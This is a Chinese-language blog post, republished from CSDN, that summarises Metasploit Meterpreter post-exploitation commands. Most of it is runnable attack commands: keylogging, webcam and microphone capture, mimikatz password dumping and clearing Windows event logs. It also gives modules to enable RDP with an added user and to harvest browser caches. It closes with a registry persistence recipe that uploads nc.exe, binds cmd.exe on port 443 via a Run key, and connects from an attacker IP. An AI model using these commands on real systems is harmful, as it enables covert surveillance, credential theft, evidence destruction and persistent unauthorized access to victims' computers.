ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

meterpreter命令总结

2021-06-03 11:29:22  阅读:295  来源: 互联网

标签:总结 nc run enum windows gather 命令 post meterpreter


前言

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。

常用命令

sessions -i 进入会话
sessions -k 杀死会话
pwd         查看当前目录
getuid      查看当前用户信息
sysinfo     查看远程主机系统信息
execute     在目标主机上执行命令
hashdump    获取目标主机用户密码hash信息
getsystem   提升权限
shell       切换至传统shell
background  将当前session放入后台
kill        关闭进程
load        加载meterpreter扩展
exit        退出当前shell
arp         显示ARP缓存
getproxy    显示当前代理配置
ifconfig    显示接口
ipconfig    显示接口
netstat     显示网络连接
portfwd     将本地端口转发到远程服务
route       查看和修改路由
getenv      查看环境变量
getprivs    查看权限
pgrep       搜索进程
ps          查看当前运行进程
reboot      重启系统
reg         修改注册表
clearev     清除windows中的应用程序日志、系统日志、安全日志


文件系统命令


cat           查看文件
cd            改变目录
checksum      校验文件md5或sha1
cp            拷贝文件
download      下载文件
edit          编辑文件
ls            列出文件
mkdir         创建文件夹
mv            移动文件
rm            删除文件
rmdir         删除文件夹
search        查找文件
show_mount    列出所有驱动器
upload        上传文件

用户设备命令


enumdesktops   列出所有可访问的桌面和窗口
getdesktop     获取当前桌面
idletime       获取远程系统已运行时间(从上次重新启动开始计算)
keyboard_send  发送击键
keyscan_dump   转储击键缓冲区
keyscan_start  开始捕获击键
keyscan_stop   停止捕获击键
mouse          发送鼠标事件
screenshare    实时观看远程用户的桌面
screenshot     截屏
setdesktop     更改shell当前桌面
uictl          控制用户界面组件
record_mic     记录麦克风一定秒数
webcam_chat    开始视频聊天
webcam_list    列出网络摄像头
webcam_snap    从指定网络摄像头拍摄
webcam_stream  播放指定网络摄像头的视频流
play           在目标系统播放音频

mimikatz抓取密码
load mimikatz   加载mimikatz模块
help mimikatz   查看帮助
wdigest         获取密码



开启远程桌面


run vnc 使用vnc连接远程桌面
run getgui -e 开启远程桌面
run post/windows/manage/enable_rdp 开启远程桌面
run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456 添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662   将3389端口转发到6662

收集信息


run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

针对未安装补丁攻击


run post/windows/gather/enum_patches  收集补丁信息
攻击:
msf > use exploit/windows/local/xxxx
msf > set SESSION 2
msf > exploit

注册表设置nc后门


upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run   #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc   #查看键值
nc -v 192.168.159.144 443  #攻击者连接nc后门

标签:总结,nc,run,enum,windows,gather,命令,post,meterpreter
来源: https://blog.csdn.net/weixin_46789316/article/details/117515067

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有